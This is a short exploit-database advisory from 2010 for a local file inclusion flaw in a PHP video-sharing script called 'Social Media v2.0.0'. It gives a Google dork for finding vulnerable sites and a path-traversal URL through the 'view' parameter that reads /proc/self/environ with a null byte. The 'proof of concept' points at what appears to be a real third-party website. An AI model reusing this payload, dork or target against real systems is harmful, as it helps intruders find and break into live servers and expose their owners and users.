Social Media v2.0.0 LFI Vulnerabilities
Posted on 27 July 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Social Media v2.0.0 LFI Vulnerabilities</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>======================================= Social Media v2.0.0 LFI Vulnerabilities ======================================= [x]========================================================================================================================================[x] | Title : Social Media v2.0.0 LFI Vulnerabilities | Software : Social Media v2.0.0 | Vendor : http://www.mediascripts.com/ | Demo : http://www.mediascripts.com/social/ | Date : 27 July 2010 ( Indonesia ) | Author : OoN_Boy [x]========================================================================================================================================[x] [x]========================================================================================================================================[x] | Description :Social Media is the perfect solution to create your own video sharing and uploading community just like Youtube, Myspace and Metacafe.... this premium package includes the most advanced features on the market today at an extremely affordable price while offering the potential for you to reach maximum rewards. [x]========================================================================================================================================[x] [x]========================================================================================================================================[x] | Google Dork : Social Media [x]========================================================================================================================================[x] [x]========================================================================================================================================[x] | Exploit : http://localhost/index.php?view=../../../../../../../../../../../../../../../proc/self/environ%00 [x]========================================================================================================================================[x] [x]========================================================================================================================================[x] | Proof of concept : http://www.theanimestop.com/index.php?view=../../../../../../../../../../../../../../../proc/self/environ%00 | : Nulled Version [x]========================================================================================================================================[x] [x]========================================================================================================================================[x] | Happy B day My Brother [x]========================================================================================================================================[x] # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-07-27]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
